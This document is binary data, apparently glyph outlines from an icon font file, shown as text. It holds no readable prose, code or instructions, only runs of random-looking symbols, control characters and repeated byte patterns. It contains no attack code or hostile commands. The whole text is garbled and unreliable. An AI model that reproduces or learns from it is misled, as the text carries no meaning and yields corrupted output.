".5AO]jv„’ ¨&&'.32;676&'&2?54/66?6.37654&#""'6?36.76&/&03?67>.'65'4&#27>/."#122'.7>>'.3767>'&'65>36'#32>5.'&%&67>+"32367>4'6257'5"+7357/4=#'#37'34?'5#'#357&5#3?'#37'35#'2735#7'5#'357'3'"&462''6257'5"+7357/&47#'#37'37'5#'##3735?'#37'35#'735#7'5#'357'3'"264&5#'357'0+7357/415#'#37'37'5#'##3735?'#21#37'35#'3735#7'5#'"357'3'#"&46327'357'5"+7357/4=#'#37'3743'5#'##3735?'#37'35#'735#7'5#'#357'3'"&542'357'50+7357/415#'#37'37'5#'##3735?'#37'35#'5#735#7#'357'3'"462''357'5357'501#'373015#'#7343'5#'#57'#377#0137'35#7'30735#7'5#'1"357'3'#'"542
->U5/E		ûA‚	­&@
47	+¹
	J	
+®;;
i5,%


-!+

#%»

#";13(/T)#


WJ
ý­

'		 						
C		1		
L	Š		
SL›.12E3	
	;<f	
L 73;


	)	þ½-*

,8
3?P
 #2(4. 

 	&		
-5ç"	#		

;				L	

	 		)	,F
-	

	H

c	
c

\

:ªX&Qo‘Ÿ­»ÈÕáîû-:GS`mv‚ž¬ºÆÒàêö,8ER[guƒ›§³ÁÇÓßíû	$27&&'.7;7676&"#13'.7>>'.3767>'&'65>76'32>'.'&%&67>#"73237>&'6357'5"+7357/4=#'#37'343'5#'#357"5#3?'#37'35#'2735#7'5#'#357'3'"&5436''357'5"'7357/4=#'#37'367/#'##373?&7'#37'35#'735#7'7'357'3'"264&5#'357'0+7357/4=#'#37'3743'5#'##37357"57'#37'35#'735#7'5#'#357'3'"&54327'357'5"+7357/4#7#'#37'343'5#'##37357"7'#37'35#'2735#7'5#'#357'3'"&462'357'5057357/415#'#37'37'5#'##3735?'#37'35#'5#735#7#'#357'3'"462''357'5357'5#'373015#'#73431'5#'#571"5#377#0137'35#7'2735#7'5#'1#357'3'"420=W50F	Î!C
‹::›)3$


, *"%·
	&902'.L(#

TýÁ		%					
E			0				K
	‡QJÕ.23F4
	
;<f8'(

,62>M}	 "1'2.
	$

		,4ã!	"			
:		J			(
		+D
-				G
		d
	

]		X	7ÿ¹±
,:HVcp~‹™¢°¾ÍÚçô#1?MYeq}†’ ®»ÉÕáíö+7CP\fr~Š–¢®ºÆÎ&&'.5723%37>76&'7257'5"+7357/4=#'#37'367'5#'#357&''3?'#37'35#'735#7'5#'357'3'"264&%'6257'5"+7357/45'7#'#37'367'5#'#'37357&7'#37'35#'75'7'7'357'3'"264&5#'357'"+7357/4=#'#37'34?'5#'##3735?'#37'35#'735#7'5#'357'3'"264&7'357'5"'7357/4=#'#37'367'5#'##37357"'7'#37'35#'735#7'5#'357'3'"2654'357'5"'7357/4=#'#37'363'5#'##3735?'#37'35#'5#2735#7#'357'3'#"5462''357'5357'5#'3735#'#737'5#'#57'#377#37'35#7'735#7'5#'357'3'"&542vTl
#™]8_?
		
!6,;0;9Sþž

						E

	
			'
þé


*%
9%},% %X‰				


)



ü								

-	

	

•
				‡

'Q(W[=b<


!841kþž

=			?		'#		
8	
$

d

‰

8/%J%3
O%}%Q

.
*²	

	/
				

		
,
	±!
		
		
¦!

ÿªª.;HUbq€‹œ«¼"2>4..3?>2?>.'26=.""2675.%2>&#&"3%&";2>&%27676.&'&72>&26/.32>&'&/&&6?6&%.>56'&õ@m?>l€l@?kþÖ%
[È[
,2	Üþ¼53(35
cþ÷$	æ.(	
TýÒ
(
3‡:


0
ù
0
2+	
 M?k€l@?l€k@þ	
5
5	qccýèdcîC¼<
, þv1
§!W

 "
	þ]
T
V

*
8	°Ÿ+9FTaq¹"!654.32?67>.'26=4&"2;2>&'#%;2>&'#"'27676.'26'&'.32>&'&'&&'&'#1"/>/&"#1&/&'&'#7676276227>76&õ3V3q2Uƒ	'	

2®þÆ(R ORZû….
.
¶6!
&<	$
;&
#5)=,8‚87ƒ7+=*2U3	
3U3KYNOì¥0	
	&#

.

.QþŸ5		
MM
5()2112)(	°¸+:HUbr½"!654.32767>.'26=4&"2;2>&#&"%;2>&#&"'2?6.'26'&'.32>&'&'&&&'&""'&"'&'&3676?6712#"2?6&+6763136767>õ3V3q2Uƒ	0	

)®þÆ()) O*(Z*û ….
.Ý)=+7ƒ88‚8,=)6!
%	<	$
;	&
!62U2
	3U2J
YOOí¥H	
	&#

'

.R
þü)2112)(5LL
5(	ÿ¨ª$4FXdsƒ“&367>.>'&'&6?>7&'&&3?676&&'&656'&%26.+"3%"#";2>&%>=6'4&".6=6'4ü7c 6.076c 5^þÜ	=>1ì2&u	 þi%1	n	šn
 
6ýޏ,II
’þF3/5/0pc 4.1qb=?<	0&2&u!þ¢%0o				m


8Ô:Ô
c 

’	þ
’
1@!
ÿ´ª&4BSbsƒ®ÏÜ5.#"3275676.32767>26=4&""26=4&%2>&#&"37326/&'.32>&'&'&&6?6&4'&'&#"34&'&#"327>54&".547476767674767>32'7>'4&V0?i>=i>.(þ1
5#ä
þÃ
33
 ‚%

ª&
&/
ó
 
0¤3<&)	-L-9L-z0	
(=
ý"%=j|i?0!
‘a01ýô01aé *

!"Z
þh6

S¾	´ˆ[0(þ¢
+
-L,\<-Má0
r
6þ,=v%
*		ÿí±Ï/<L\kx‡•¥&&'.31723%37>76&676.?67>.#'676?6.>&'&'&&>&'&'767>.'6/.7>'&'.vTl
#™]8_?
		"5/
;0;9SþDt&$=A8î			9M
þÿ
c
0
4
†	
L
	


Q'XZ=b<


"841k'
95B8$J
	j
//


Š


ˆ
G

6	
		
ÿ¨l#A&767676&#'"7232667#&%"&767676&#&736#&¢	PP
a	$/2	%"wó:R`
`& !	ü19ø#E0

þ¢
	P£©UR‹+
FŒ	8p@b«¤‰°³Ïéþ#5@DHLN&'&'#"36'&'"4?6'&'&/'&'.76?&'.767>7&#'&'&'&67676?67"7676767>'&'&'&'7676767676?65713'&'&'27676767&67&'&'&'&'&/'"'&#76767&'676'&'""'#76767>'"#7676'67501"301#1š-QxM8
	 1C


(
 #


8*('
	
"

),4$ %3$K3m…dOD9IW%òqh5.F@	)$+2'0,8]>
;_);ZUM=3?1#0e3O@U3"þ'N
.j>kNSn3‚")"+9OA'…'O.		#9ô?Y$)7,
 $$

)7!
	4DYýCœ;"	

$
"!


	 "(

#

	!$	*
&ª 	


%7L!"
$
4 
Ôç			
=
L


!/~Gÿ£‹3S&'&'"=4#"#7>6767>76&'65&&'&?54&'1"7>'.u2}Ue	®n^'k2*œœ
t^Î
,?2

)@#*5
½‹L4*		m’(Z?	`pooob$0'59ZBþ¸	
 /& ó	
ÄCF7
F.	ÿɪóO&#""'.#"".54622654&'&#""'.#"&7>76726=4623¢"/&<<&.# 7@7 '8&"/%<<%1 oVYhhYVo^	
þ÷!9""9!((	
		\›/1

1/›]
ÿ¨‰<Vn‡—¨&'&'.+;'7676#"767#;'7676&#"?#"3!26&767676.'7>27>'&/.676767676'.776676.626'.{ŠL0	  <)4!B		0LŠô
þ6
	
:?+ "'#‡	#10ÿ*		69

O(V‚QQ	T )0\ (Q	QQ‚V
D-O03#+Œ')		


(a
	//!-¬
/
¯IK™ç67627622762676276&'&'&'#.'#"&'&'#&'&'&'#&'.'#.'#''.'#&'&'&'#7676227622762276276&&'.'#'.'#''.'#&'&'&'#767627622762676276&m0 +c,+c++d+!/!
)

/*

	&)&	.		


*
=
	.*
%
*-
		(."+d+)g)+d+$, 
	.
%
.

'."+c,)g)+d+$, Ã &&&&&& (')


(i'	(#$(
	
(!&&&&&&! 
'	(#%(
	)!&&%%&&!­\&¤×27>764&'&'&"762#"&4&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&Í!
)"-
0	
Æ"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G K A/
@Œ&)	
'Qô	!			"T2< .



	"?rN4R*

-0G
					­\ƒ¶35#3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&ó0H³"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G"3ð0þí	!			"T2< .



	"?rN4R*

-0G
					­\.¬ß35#32767>4&'&'&"762#"'&4&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&’0HX+


#-1	
ª"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G"6ð0¨

3A1

	@Œ('
Pö	!			"T2< .



	"?rN4R*

-0G
					¬]‰¼35#335#3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&È0HT0H‰"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G 7ð0Àð0þê	!			"T2< .



	"?rN4R*

-0G
					¬]8¶é35#3#546?676;27>4'.'&+32+"3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&¤0Hßr
VV¢""' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G"7ð00
HV	!			"T2< .



	"?rN4R*

-0G
					­\2°ã#546?676;27>4'.'&+32+"3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&Sr

VV
¢S"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G"c0
HS	!			"T2< .



	"?rN4R*

-0G
					­\3±ä>7654'&'6764'.'&+32+32+32&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&-




``BB``
ˆ"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G";



0
0
0V	!			"T2< .



	"?rN4R*

-0G
					­\
‹¾3535#5##7#3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&11B0xŒ"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G"300xx‘Áƒ	!			"T2< .



	"?rN4R*

-0G
					­\" Ó67>4&'&'&+735#32+32&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&.
,i”a
aaƒ"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G"8

$)1Š
0S	!			"T2< .



	"?rN4R*

-0G
					­\#8¶é27>54.#"6?>7#7>762"'&'.&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&Ä
#%
 	A
)		
Ë"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G"R
&

	

 G


½	!			"T2< .



	"?rN4R*

-0G
					­\ƒ¶37#3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&×3S©g‹"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G"6ð0þê	!			"T2< .



	"?rN4R*

-0G
					­\6Piç26767654'&'.'767675654&'&'&"76?6762#"'.46?6762".'&56&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&Â$%%
		2
	
	
Î"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G"L


					 



a	
®	!			"T2< .



	"?rN4R*

-0G
					­\*@¾ñ32?6736?67>54'&'&'&"7>2#"/&/.4&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&¾


	A	

+	
&


Ï"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G Œ$

I	

ù	!			"T2< .



	"?rN4R*

-0G
					­\}°%&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&¦"' 
'*bBK1

5kXS<&

!!=!C F@=D%
¢C1				  = G à	!			"T2< .



	"?rN4R*

-0G
					®`2Uo“&#%"3!32".7>>'&'&767>'.'276.'&26?># '"3!2"+"!26'.%&'&6?67>+";237>Äýî	
Y°*=-# 6

.!)$#9šK"$$?		
'(*þ¦­šQR­
R		%"
+&	!
c
	:#e	;*#/#!$B
@#/@+;=0	
"%
' `

	&Å'	(#/
ªW(1:CLU^‰¨Í&#&'.323737>&"&462"&462"&462"&462'"&4627"&4627"#3'.7>>'.3767>'&'65>76'32>'.'&%&67>#'#"73727>&-<T4/D	
	® .þËŒG=	
Kœù:;œ)4$

- +	#%¸	&;02'/O'#

&!×-11E2		9;Ö

O				M^8()
+82?M	"1(3.

	%
	
		,4ªš%9[|˜´Ðý7Y%676&'&&'.32;232767'&'&772?4326/&?6&#"/&2?4326/&?6&#"/&'02?432/76&'&721?0325'76&#'&"3'21257013251'76&#'4"3"+362'.7>>'.3767>'&'65>36#372>5.'&&#!"3!232>&%&67>+"73727>&ÊB0=W50F	
	³4e,	!2Â					??—t9:4E")4$


, *"%·

-
12'.	þô


 T(#


T!ä=<.24F4	
+)!#b		Z		þÃ8()
	+72?N}	 "1'2-
Æ


*"×	%		
		,4	ªU$2=KWe‘¯Ñ&&'.32;676&&?676547&?654732?6'."7676&%327676.%"#132'.7>>'.3767>'&'674636'32>5.'&%&67>'#"737>&0;U40E		ý@þu	$
Ÿ+	,I
		9	
C	þò
	Þ::œ+$

, +

#$¸	
&:12'/N&#
	$&!#Ô-13E4	
	;;Á	$

,	+
8
	!

,)

+8	
2>N}
#1(2-

	%	
			,4
«Œ'4CRarƒžËé$%676&'&1&'.32;66?6.37654&#""'6?36.&>&/2>&'&'&03?67>.'65'4&#27>/."#122'.7>>'.3767>'&'65>36'#32>5.'&&#!"7!232>&%&67>+"32367>4ÄB->U5/E		Ë ¨&@
47	+3
Ú
	´
	J	
+®;;
i5,%


-!+

#%»

#";13(/þõ	


![)#


WJ
ñ;;.12E3	
	; 73;

fa
)	þ½-*

,8
3?P
 #2(4. 

É


*#Ü 	&		
-5	ªW6R^l{ˆ´Òô&1&'.5736?>372337676&"&76?6&#'"636767&?65677676&0#7676&%?676.%"#132'.7>>'.3>7>'&'67>36#32>'.'&%&7>+"73237>&->V40E	))Y'!B
ç
4/å	$

5í
=	þó		Ý:;*$	
, +#%¹


-:12(/P'#	
VÕ.13E3	
	
j6:<q
g5>JB"Q	$

5
	
&


	}-)

,8
2?O~	 "2(3.

	&
		,5ªW6R~œ¾&1&'.5736?>372337676&"&76?6&#'"636767%"#132'.7>>'.3>7>'&'67>36#32>'.'&%&7>+"73237>&->V40E	))Y'!B
ç
4/5:;*$	
, +#%¹


-:12(/P'#	
VÕ.13E3	
	
j6:<q
g5>JB"-)

,8
2?O~	 "2(3.

	&
		,5«X&Ss´676&'&&'.3237%"#122'.7>>'.3767>'&'67>36'372>5.'&&#&"73723>&%.67>#&73727>&ÆA
->U50E		±(;<
j5,%
 
-!-
#'»
	&
23(0	µ@ 
‚


 \
"$

'&"	,;<-13F3	
	
6-*

,8
3@O€
 #2(4. 

Ê	+#Ý&
	
	
	-5ÿÒ¶ãR&'&7676=#54.#5474&#&'&5&7>/.7>7676r#:+A)9$.-2,%_'0\Dgd+@M"Ž]ci^£36fA2	9	=TO¢:%*
3uf
eA!
+%y'þÔ>_†‰]	99VZT\!#
iRTd‰ÿ§o
)7AKU&#!!>7&=6767676'&7>"#+532+532+532èþóþh
!*
þ0"¸))))))ü–#ýÕ		
)8$#	5"ý	 kŸy´ôy³ôy
´ÿ¨ª)5"276764'&'&"'&'&476762276764'&'&ôwfc9<<9cfîfc:<<:cfwiYX3443XYÒYX3443XYi[NL-..-LN<:cfîfc:<<:cfîfc:<üÉ43XYÒYX3443XYÒYX34Ñý`.-LN¶NL-.ÿ¨~-=%4/&'&'.'&'&'&'.5.!4#";26?6&}
='+A/(_.'"3þóù¶^=NLL<F*.&
Y7…cD:0!++U0	0ÿ©|O]%'.33264&#"#5>54."#&#"3273&'&'7>/&?27676"&'&5462x(‚")-5M""M'2%?J?&2'M
""
M6,)"ƒ'&0HYÕYG2%þž"b®	
y
#	s	!0"	(G,%?%%?%,G(	"0!	þ
#y
	®F*55)G%
ÿÙªã
,"'3!265#!"&=463!234&#!"3!53’àþØ(#ý
#8ú9ÌþA¿ÆFF¡##y--ÿ¦®Ym&'.76?676?67'&'&'.'&76767676'&'&7676776767>&'&767>7632¨#"k†H‹¼v		#$l‹I$#	
!T25e%'3-+IG^{’1$	%+$2902@" 2&)F;2/ þt	
+- 
êQ=:IkY[V^=@O
,`DNHK:9*'	hp%V$&,M
St@+6	!""20|Ç#+#" ÿ¨>cg#"&'.547>32"&5#267>54.#"#"3!265#!"&546;#3#3#3#!5>7!!ã3,'+ %
3(>ã

ê
þ@̂‚‚‚‡”
*å, 5þn,þÔÉþŒ3'O	&þª*þÖ
'O34'
ý/

ý“
¦ C - #	 #ž ¹¡+AV\&"27676'&%+;2654&&"27676&&"27>&%;,
ij
SþQ{

ž–
¦	ùBC
<*”
 ý°œ
sþÊuVwrsuB
uþ÷›KO
MÊL
@VQ¡'
$\$
$^^'þ÷
ÿ²«
Š™(Q"76?6"7676763276?>/&76763276?6/&76'4?>'&/.#'&'&?6'&'#&#&"/./4"&'&'&676%6?2/."/&'&?6'&'41#&"#&'#&/'&'&"37672"3?632?>/4?676?/&574&'&676#".'&6?>/&"3276?>/.C:
(1%


;4).&3
:

/
c

$
!+%"'#j$$ð02DyZ2I,>Hr›VD982+&m5	99

&!


<
1)/1	
-	
á	"&"+
%
$

)"*)%#ýß6c@\·?85ŸMR~E"7ÿ§L3%"?66%"/&#'./&/37232672?6376?6?6?6?6/&/4/&/&#'&/&"#"Fs
6	6J8	l
þÆ06
v

n9¥.	
6-
0
6
.	.	
6	00

6
	.,.

x¦Qž.	þû
R
6
	.		.	8006
.-
6

0ÿýÿjéPDLU’•.'#'.54&'##&#"65>367676767676'4'%4>2&264&%###&'.'&'#&/%39?67676765659#ãB2uD9Ê(?8+9AK^Ti	 . PHL:B1ýu)GSG)˜#ßK~Ç
		Ê{LVWþ:3B
8D0'
	D<LW&; 
$ 
$3		
.9"C34þ('1$#3$WDT		TDþÖ
	##
“ÿ¨‹!%)34&+&/."#"!%67>2!!!7!#!"&?!r AOeme'(@ üýÐ	NWO

ÞüàüüÙ" ý@ (J )<!! (!^–
ýÖþ>3d## ÿ¨¨ +."2>7654&54>32#"'…"t¤¯RPu"##%7;PR¯¤t"#ýJ3SŽT\NrRs?ZO­1QuF#"vQO¶OT8;"#FuQO[XþÿM\TT4þ…:R22¬NZ@ª{3#3#3#3#3#3#3#3#?bbƒccþ11322W11Ñ22Wý¿””{ýÆ:ýÆ:ýÆ:ýÆ:ýÆ:ýÆ:ýÆ:ýÆÿ©:JZj3!26=4&+'&54&+""&54&+""&54&+"+"32+"&=4632+"&546546;2+"&h	ø

#	°

¯
	°
	4	


æ€

€		õ	€		€	9		


üå				ýí		

þp
.	Y

Z	þ÷	þô			çT

T

ª¦?O_o76&/&#!"&/.+";23!267>;26=4&+"&#"&/&6;23#"&=46;23#"&=46;2>/m
þÆ
m/>z?
6	$	5	?		{þA 	A	¼A	Až @	K'„„'K	dþ 	`d	þTêêêêêêª9/#"&=4&#!"3!26=46;26=6&#!"&5463!2ž2üô1Œý†z§|þa{{Ϊ9/AO`#"&=4&#!"3!26=46;26=6&#!"&5463!2&/.+;272'%.+;25%#"33726=4&ž2üô1Œý†z¹"4§i£þ¼bÃ
cÃ
i>§|þa{{Îí#EgÓÒÄ×ÒĪ9/AO#"&=4&#!"3!26=46;26=6&#!"&5463!2&/.+;272'%.+;25ž2üô1Œý†z¹"4§i£þ¼bÃ
§|þa{{Îí#EgÓÒĪ9/=#"&=4&#!"3!26=46;26=6&#!"&5463!2.+;25ž2üô1Œý†zþbÃ
§|þa{{ÎÄÿ¨:09BKT]f#!"&54743#"&46;2!&=&546;2+%462"&7264&"7462"&7264&"'462"&7264&"9'ýü'³3k„o
3

ºþ‚

c



L

		
''Õ
þÏþå.þòþ)ò	



		



	G
			ÿ¨X?amy"'&'&'&'&'&'&'&'4&327676767676&'&'&'&'&&'&76767>3264&+"!3264&+"B

,#%"'
	->f)()K;4 

ù!
		
"þÚ**
Z**
ŠhPo*<+	
	$#
.7($F$hg“k—3 ZOqeeVLþ…

"	ͪt"45>!#5!#32362!'46;#?!"Hý&G6
ŽF^|? ýËÅ"m§B
!þô䘘«#[f"
ÿ§‹1CPYfuœ¨.7'763276?637676767>'4'."27>%4632".74&62?64&"'2326?6.37>.264/&"23>/.2>&/&…$ 
#3F
 Ÿ"-Z-/
	
TA7–+*ަHF)+QFH©IGSþ_>-21;2))¢`	`	
	EY
ýÌ
`
	
	:	T
J!#J.ETT'+	KA^&IVHFQ*(FG§),*(R.@1;20 (,b
c
U
T		
c
Y	T
T-ÿ¨ø<K[p‡ž¾Ð&'&'&'&276761+";2;2654;2654&#!"&'462+"&&6?6&'7'&'&57>/.+"&5'46;2?6;2&/&6?62;2'#'"&'"/&5'546;26'576;2#&/&6;2+"&Þ
&6$	(	)
Ò
)þü)
<;]
	E	
&	*)
	'&/

	“æÇj<.
"*5ýh˜ªT-;H(		
	E	©3B	§7 
	9
B
}"Oªt.7@IMt‡Ó!#>32#"&'!.54>2!>?."&462264&"4&"26!'#"!'5&'&+'7>5'!;?>54'.#"26'"'5#/&'476?32654&/&'.5467562'&#&#")ýŒ!
*'88'*
"%+F)2TcT1(G+ +I8N88N8”,,þ,,·k		ý@Æþµ*38**273

&


B'n8N7n 	?`8=h==h=7`@	=)Í'77N88',,3ýÔ,þ	‹þµE&N65DLE3W 	


ÿ¨:	)9M3!267!46;2+"&546;2+"&546;2+"&5#54&+"#"!54&û›ýÒt}

}ȾǽŒ-lš

þ

c

þ

c

þ

¤$$WW,ÿ¨M&6@QZju‚”Ÿ­ºÎØåù%/BM`iv…’¥¯¼ÉÜæó
›¤­·.#"2>54"&4625#6?677.#"2>54"&47627.#"267654"&4627.#"2>54"&476325#6?677.#"3267654"&476325#6?675#6767267654'.'&#"7632"&45#6?67.'&#"32767654"&4625#6?677.'&#"32767654"&4762654'.'&#"326"&47622767654'.#"562"&45#6?6775#6?675#67677654'.#"326"&47625#67675#67673276764.#"72"&465#6?677276764.#"72"&46!"&=2?6735#53267654&/&'&#"52?35#526764.#"576735#5463!2676735'&'&"27634&/.#!"3!&62"&462"&4"&4762#'5676/&#"#/&'&+"#&#"32?;276?32?6'&/?>=4'&"&4621

E		g	

U	

U	

	þÓ
g	
	D	L	J

	

	lþ¨

D
g	

S	
	

B	l	M	þY		e	

P	L	û	



`
-


_þÚ
	
			

s
	

-

Y
"þdvþ¬$:
&%' 
&$&"	ž##1""«
./1a	LG
+/	..
+/..
+/	.ºaKF

	+/	0aKa	L

R0/Ga
K\	-/aLG	*/	0	/	3
	
R./GaLaL‰`	K	


/	0`	Ka	LV



3/XbLL


0/w
AK`\	
	tKa\	
‹Ka
KP4
!
 
Ã_$güÜ-./5./8/	.þ 				$		$X".#"0!	±z%2>GU`o|‰&'&'&'&76?677676&".4>2462"&5.>2.>676.'6.366&>&6.v6Z7B#:>(+)#6/M9T0k3	 QuAn!ý_(C)(DPE('EÀ


$ä(D'*EPC')D»
24!Ç	
#31î	ZG3ýq
[G7„9U2	50Id/J&a>>
i3^í(EPC)(CQD)d

@¼$%h*EPD&)D')E'Î	+$+
ø4H[
/F[	ÿ¨ÿ3?K'."/&"2?626?64/&4?64'&=46&=46÷Ó
£ÎΣ
Ó––¯,,4,,.Òþë¢ÏÏ£þêÒ––4-,oþ--p-ÿ¨:+e}2=4&+&7?>/&"'?>/.5#67676'&'./&'&'&#2767654'."&>76767>Ÿ--l#$4
fQ	#0

/ 
a@f,,IL°LI,,e‘3)
*<«

#å? 



	


/>\=@GXMI+--+IMXG@=[ýå '

5 -ÿ¦?62654&#!"ç	ðð	
þ	þü¶	÷÷	J	

«„
'97%2?34&'&'%6%&/&27%>574&“S8eþ©E4þ÷8ÇSþ©e8Xþ÷47>²ã?B~ÐBÆ
²?ã ~
þ:BЪ©
"&%#5!3!26=!!54&'!#"!54&!#53L°þ£þ¢5þðþÿ÷kþµ¿¿ÛPððXWµµGÿÓ®å#;?CG'/"/6?>&77/.?>7/&7'7/7RA¹B	¹5)¸A¸CC5þÉ@?NOÁá

&
(áAáF<&!á%fB9K®Oþ‹¸A¸)4¸	B¹5CC¨00 ñ<ƒ'@ƒ>„"AE<„·E%,ÿ׬ä7K7!2767676?'&'&/&'&'.7>767>7>76?!%&'&#!"3!27>U
'
R#/›\ !6GK`	ü¾U 	ý
!ù[H‘þòˆ	,lŽ(.#T&(		
*¦)2a!ÿ¨<,r„–Ÿ©363!2676?'"'&'&'&'.7>727>76?!7>&'&7632?6767>676>76&'&&'&'&&'&'&&'&#!"3!276'264&72.46264&72&>Ä,#EN	%sC	QŠ		ý˜ 
#I*6@+
!#:>20 	2jýÚ	3
`*+:++"þƒ ,

„šþÎ	
 "Pi	!z>?‚
		*0H:/;%&
5
17Á*=++;+s"#> **J
ÿ˳ñ!FQ3264&#!";3!26532676'&'&'%&'&"&=&'&"&5&'#5!'&'5Ð		ý		6U5'
74CþÐ"	
(è2&+1>.*)Ã

ý)a+',*$8	ð

Þ

	þ÷			Šþ›¥#'#;ÿ§­&'&/7676'.7676'.76763264&&"'&'&'&32'&?>?676546;267676?>/&'./76=4&'%+"&=46;2ƒ]\Z+

C'

6

'C
+ˆ9.
\]	‘
].&S		+
+		S&.0

	þ‹



-.(<	U
:817717:

[	% .-
		I')~
<g2	,?Kþµ?,	2g<A ++@		

â

4

ÿ¨*!3!33#3##535#53#535#53*ý”"("þàrržsssssssrrrrIüÝ#þÝrsþÅs+rþðsÈsÿ¤“'3?N\nw”¨»26=4&"32>/.'&3276&#";264&!#";264&'.32?>'32?6.26?6=4&""264&763267676'&'&'&&'&'.>&#&67>'&ô

µ	

K..>44

ß55

-..È	

±
"" RVg
:E,"1 ƒ32KOm99:*1wJ8_80o
&
99º6

6&	/–
	¨


À	S	//þ”		`//Š! irWTŒ5!#_¢SCAþ  ).ŒQ@j?5[Ó
ÿ¨…,4'&'&'&'.;2>5#";26=4&…
'
!,*
ö	
õ	

	õ

Ð8:.:4D$JdJ•{1
	i

	h	
ª¸7GXlz673?6767>'&/&'&6"7&'&#"7>'<&3676&'&'67676?6'&7>.C

/T0i	
&4H*#^$1
!e		(	N"i'%
		M	

#
/\
	
9×
3i4Q
Úþ
ÂþÙ¦ 
+

ÿôªÅ}&#'"'.'67'&'&>7676''.'&7676&67>'".7>&'&>767%62?67z	2aœŠmF! 13QN±™-* UWvDqD('DFPvMI=]B2#!	LYS>>+6 *B$!!!#%$R/'
%!€
X9RP¬IL)'ZKFQOF0(sKN	HsEPFC&'	[	/H.SY(&,"# Q'(+2!7%:	! 	½

ÿ©¨AQaqŸ¯¿Ï4.+"&=6'4.+"&=6.'&+"3!2654&+"&#"&=46;2'#"&=46;2'#"&=46;2#"&=46;27+"&=47325+"&=46;232+"&=46#"&=46;2#"&=46;2ã"";##<¤T²þcÖÖÖÖÖÖãããå
ãå0ÛÛßÛÛÛÛ¹#
!
%	ýôý––Ïžž×˜˜þZ••Ôž6˜Æžžþ••¦˜˜ª‘)6!54&+"#"3!2656&"&'&54>2'".4>32•ýâ	¯LB
þöWjV.P^P.G/6//*;?>>þ		ëþ²/;:.!$/O/.P/!"//6/;ªµ+8E#54&#!"#"3!27>54&%46;2+"&5".4>2"2>4.3|þÚ1BB1‚,5Cþ¢¢v6\57\n\57]5$?%$?H?%$>7D""DB1þ·2B@-D4B.ýù7]m\57\m]5P$=I?&%?I>$ªŒ/?O!"3!2654&46;2+"&5+"&=46;2#!"&=463!27#!"&=463!2aý&**Ú++þYââ2ÚÚ]þë0þ¼DŒ*þ4+*Ì*þæXÄĆÿù«Ã(1AQa!"&'.+";23!26=4&"264&3"264&!"3!26?6&!"3!26?6&7!"3!26?6&4þq	·	†b	¸	³þ¡"00D10ð"11D00“ýº		]þj	j	(þ	Â	£!þ]!n0D11D00D10E0·##Û##n##ÿðªÌ1AO_!'./&#"26=!264&'&/!2673264&#"/46;2217+"5'46;2+"'5&?4;2}ý‰
_
	F#2#$#2#-¦	pPþF;T.­%4&²;G.T9[

ýü$$$$0"
&%þÎÌÎÑÏÎÎÎÿ¨ª?h"276764'&'&#"'.46767632&/&#"32?67#"'.47>32&'&#"32?67ôwfc9<<9cfîfc:<<:cf³* ()'	-3d	
++
,;('

/1d	<:cfîfc:<<:cfîfc:<ýš
-EIF
	

	;=u

	

1?M# 2		
;=u
	ª9/;#"&=4&#!"3!26=46;26=6&#!"&5463!2&/'5'ž2üô1Œý†zþ«.E¼6-¬§|þa{{΍mSmÿ»ª,4'.#!"3767676?6;7>7©
F1ýœ%;"C.NA4	g‰D8Iy.7"<%ÇÇ,7
=$


	J8 B%"/7Ÿ¢4ˆk1†¢5‰n5ÿ¨ª-B&""/&"276'&/"276764'&'&"'&'&476762¯ùY5ž<Îwfc9<<9cfîfc:<<:cfwdVS1331SVÈVT1221TV'þøX5žOÿ<:cfîfc:<<:cfîfc:<üÙ31SVÈVS1321TVÈVT12!W%'&4?62276762"ŒÁB	l	eÊ
Dÿ
jÀ	AllÖA	ˆþðÿѪì'?%!"&5463!26?6&#!"3!2654&2764/&""/&"Áþˆ
fýˆîgþkCº
ìC
þi
e
IþfýØfèmD	ºì
Dþhfÿ¨F(;KXaj&'&''&'&'676?6?;2657>&'&%67/&'&'#6?'.2>4.#76&4626.Ž? ,#)ÅOQ !¼
 þ³d	0>  h @g!TT 3bï"8@7 !8 4Dx#22E41%#"1 $³%2¹
!þr

